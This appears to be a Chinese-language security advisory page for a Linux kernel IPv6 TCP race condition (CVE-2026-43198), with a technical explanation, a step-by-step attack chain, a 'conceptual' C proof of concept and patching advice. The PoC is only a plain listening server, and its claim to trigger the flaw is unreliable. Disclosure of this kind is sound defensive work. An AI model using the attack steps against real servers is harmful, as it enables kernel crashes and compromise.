CVE-2026-43198 CVSS 9.8 严重

CVE-2026-43198 Linux内核TCP协议栈竞态条件漏洞

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43198

漏洞类型

竞态条件

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核TCP协议栈中存在一个严重的竞态条件漏洞。在`tcp_v6_syn_recv_sock`函数处理IPv6映射套接字时，子套接字在完全初始化前就被插入全局哈希表，导致`newinet->pinet6`指针指向错误内存。攻击者无需交互即可通过网络触发该漏洞，可能导致内核崩溃、内存损坏或权限提升，CVSS评分9.8。

技术细节

该漏洞发生在Linux内核网络子系统的IPv6 TCP连接处理逻辑中。具体而言，`tcp_v6_syn_recv_sock`函数在调用`tcp_v4_syn_recv_sock`后，子套接字已被加入TCP ehash（扩展哈希表），此时该套接字对系统所有CPU核心可见。然而，将`newinet->pinet6`正确指向子套接字私有数据的初始化代码是在`tcp_v4_syn_recv_sock`之后执行的。在这个时间窗口内，如果其他CPU核心调度并访问该未完全初始化的套接字，将访问到父监听套接字的`ipv6_pinfo`，导致内核空指针解引用、释放后重用（UAF）或越界写入。修复方法是将初始化逻辑移至`tcp_v6_mapped_child_init`辅助函数，并在插入ehash之前调用。

攻击链分析

STEP 1

步骤1

攻击者向目标Linux服务器发送特制的TCP SYN包，建立IPv4映射的IPv6连接。

STEP 2

步骤2

服务器内核调用`tcp_v4_syn_recv_sock`处理连接，并将子套接字插入全局ehash表，使其对其他CPU可见。

STEP 3

步骤3

在子套接字关键指针（`pinet6`）初始化之前，攻击者利用并发机制迫使另一个CPU核心访问该套接字。

STEP 4

步骤4

内核访问未初始化的指针，导致内存损坏、内核恐慌或潜在的代码执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-43198 (Conceptual)
 * This code attempts to trigger the race condition in tcp_v6_syn_recv_sock.
 * It creates an IPv6 listening socket and accepts connections to hit the vulnerable path.
 * Exploitation requires precise timing to hit the race window during ehash insertion.
 *
 * Compile: gcc -o poc_cve2026_43198 poc_cve2026_43198.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 9999

void start_listener() {
    int server_fd;
    struct sockaddr_in6 address;
    int opt = 1;

    // Create IPv6 socket
    if ((server_fd = socket(AF_INET6, SOCK_STREAM, 0)) == 0) {
        perror("socket failed");
        exit(EXIT_FAILURE);
    }

    if (setsockopt(server_fd, SOL_SOCKET, SO_REUSEADDR | SO_REUSEPORT, &opt, sizeof(opt))) {
        perror("setsockopt");
        exit(EXIT_FAILURE);
    }

    address.sin6_family = AF_INET6;
    address.sin6_addr = in6addr_any;
    address.sin6_port = htons(PORT);

    if (bind(server_fd, (struct sockaddr *)&address, sizeof(address)) < 0) {
        perror("bind failed");
        exit(EXIT_FAILURE);
    }

    if (listen(server_fd, 10) < 0) {
        perror("listen");
        exit(EXIT_FAILURE);
    }

    printf("[+] Listening on port %d. Triggering vulnerable path on accept...\n", PORT);

    // Accepting connections triggers tcp_v6_syn_recv_sock
    while(1) {
        int new_socket = accept(server_fd, NULL, NULL);
        if (new_socket > 0) {
            // Immediate close to stress socket handling
            close(new_socket);
        }
    }
}

int main() {
    printf("Starting PoC for CVE-2026-43198\n");
    start_listener();
    return 0;
}

影响范围

Linux Kernel (Mainline)

Linux Kernel (Stable branches < specific commit fixes)

防御指南

临时缓解措施

建议立即更新Linux内核以修复此竞态条件。在无法立即重启更新的情况下，可使用防火墙规则限制入站TCP连接，或通过内核参数调整网络栈行为以降低风险，但最根本的措施仍是应用补丁。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表